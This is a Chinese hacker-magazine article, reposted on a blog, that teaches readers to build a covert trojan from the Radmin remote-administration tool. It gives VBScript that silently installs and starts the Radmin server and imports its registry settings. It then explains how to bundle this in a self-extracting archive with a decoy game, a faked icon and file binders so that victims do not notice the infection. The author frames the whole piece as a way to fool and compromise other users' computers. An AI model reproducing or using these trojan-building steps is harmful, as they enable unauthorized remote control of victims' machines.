再谈Radmin——对“自己丰衣足食”一文的补充

作者:redbin[S.H.C] QQ 50950204 Email: [email protected]
HttP://WwW.SchoolHacker.COM

该文已经发表与黑客X档案2005年第5期
版权归黑客X档案所有

Radmim作为一款优秀的远程管理工具,深得安全界广大黑黑们的喜爱,从看X刊到现在,看到写Radmim的文章也有不少了,今天特意把看到的东东来作个小补充,让大家把Radmim这款宝马用的更加自在。
在X上,2005年第一期Page42有雪蓓朋友写的“自己丰衣足食”文章对Radmim的使用结合了制作winrar自解压木马的思路确实很不错,不过在使用过程中,我发现了有两处不大妥当的地方,后经自己的测试,终于觅得一新方法解决这两个弊端,So,今天我就冒充一次大菜鸟来把我的方法给大家讲述出来,(只听旁边窃窃私语:redbin脸皮真厚,竟然冒充大菜鸟)
首先我先讲下,按该文制作后所出现的两个弊端:
1.运行后闪出一个黑黑的命令行窗口。
大家按照文章制作后,不知道有没有在自己机器上运行测试一下,不要告诉我你怕中木马,自己配制的东西,自己对它就要有信心嘛!在测试过程中我们发现运行自解压文件后,会弹出那个黑黑的命令行窗口一闪而过,这是怎么回事呢?其实这就是由于我们在制作过程中使用了批处理文件bat。调用运行的是这个批处理文件,而批处理的运行会调用cmd或command来运行命令,因此会弹出那个讨厌的,心烦的,想砸死它,想踩死它(小菜语:你有完没完)的命令行窗口,哎。都弹出这东西了,那运行的人肯定会怀疑的,再菜的也该意识到中招了,当然会检查检查再检查来删除掉我们的木马。以上为弊端一。
2.文件除了运行一个批处理后没有运行其他东西来掩饰我们的木马。
按原文方法制作后,运行制作好的自解压文件后,只会弹出一个命令行窗口,而没其它的玩意,我们先假想一下,如果我们修改下让该程序不再弹出命令行窗口后,运行该文件就会什么反映也没,当然,我所说的什么反映也没是指运行后无任何东东显示在屏幕上,(小菜语:不是有显示一个CMD窗口吗?还有就是反正木马已经在运行后自己安装完毕并运行了,我们还有什么好怕的呢)我晕,首先我说了,我们是假设修改成一个不显示CMD窗口的文件,但是你不觉得运行一个文件,它没有任何显示要比运行它出现一个命令行窗口更加害怕吗?没有任何显示,超级典型的中马特征啊!以上是弊端二。
那该怎么办?嘿嘿,该怎么办就怎么办!下面就由超级大菜鸟redbin给大家讲述自己的办法来实现我们心中理想木马的目标。
首先我们还是要按照原作者的制作方法来制作,只不过不同的是,我们利用的不是bat文件了,我们用vbs文件来实现这个无闪命令行窗口的木马,编写vbs文件,代码如下:(PS:脚本的制作来源于校盟的r4t参与写作完成,在此对他表示感谢)
On Error Resume Next
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("r_server.exe /stop",0)
b=wshshell.run ("r_server.exe /install /silence",0)
c=wshshell.run ("regedit /e reg.reg",0)
d=wshshell.run ("redbin.exe",0)
大家应该有发现我们还要把bat文件的命令移植到vbs里了,是的,vbs文件运行起来有一个好处就是可以让命令无显示运行,这样就可以不再闪出那个讨厌的,心烦的,想砸死的,踩死的(众人皆倒:我晕,又来了)讨厌的cmd窗口,滚一边去吧!(旁边一小菜发言:redbin,为什么你写的vbs里多了一个了一个redbin.exe啊)好,我就是在等人问这个呢,孺子可教也!下面给大家解释一下,这个redbin.exe是我们需要找到一款小游戏或者flash。慢,先别慌着搜索redbin.exe,你搜索不出来的,我自己还不记得啥时候做过一个redbin.exe呢,我的意思是,去找一个小游戏或者flash,也要放到这个自解压文件中去,由redbin.vbs来调用到它,诱惑它运行起来,以此来麻痹那些运行了你的木马的用户,嘿嘿,够阴吧!哈哈哈哈哈(小木头:redbin肯定有癫狂症)好了,不笑了,我下面把制作方法给大家展示一下,我们把r_server.exe AdmDll.dll raddrv.dll redbin.exe redbin.reg redbin.vbs放到一起,然后制作这个自解压文件,同样,我们切换到路径项,在这样放后运行空里写上redbin.vbs然后压缩成我们的自解压文件,现在这个小东东就OK了,当然我们可以再美化一下这个小东西,找一款文件图标,修改工具,或者直接操作出exesope来修改一下之后的图标,让它更加像个游戏图标了,那样就更容易去蒙过好多人了,好了,到这里也就给大家讲完了,不要急着翻页,我还要说上两个东东,我在这里再给大家两个思路,大家可以看下哪种更完美就使用。
1.redbin.vbs里去掉set cmd="redbin.exe",0一行,不过redbin.exe还要放在自解压文件里,然后我们在写释放路径的时候这样写,redbin.vbs&redbin.exe 这样也可以实行redbin.exe文件的运行,当然你会说和第一种没什么区别,在这我只是给大家一介绍那符号,用它可以在一行命令里写个多个命令如此而已。这个没有测试,谁有测试若通过的还请告诉我一声:)
2.我们还是不写set cmd="redbin.exe",0一行,同时也不把redbin.exe文件放入自解压文件,我们可以使用文件捆绑器,把制作的没有redbin.exe的自解压木马与redbin.exe文件合并成一个新的文件。
好了,这两个思路也没什么新意,只是随便给大家介绍一下,文章如有不足之处,还望高手斧正,欢迎大家和我一起交流技术,我的qq:50950204
续:3月20日,又想到了该脚本的不足,我们可以结合以前看过的魔女の条件写的“狙击4899肉鸡一文中”写的的批处理来修改我写的脚本得以制作一个替换掉服务来运行的RADMIN,那样可以让你的木马更加肆意!具体脚本代码我就不写了,以免有骗稿费的嫌疑,如果有愿意和我交流技术的欢迎加我们的群:6160610,谢谢大家!

相关日志

抢楼还有机会... 抢座Rss 2.0或者 Trackback

发表评论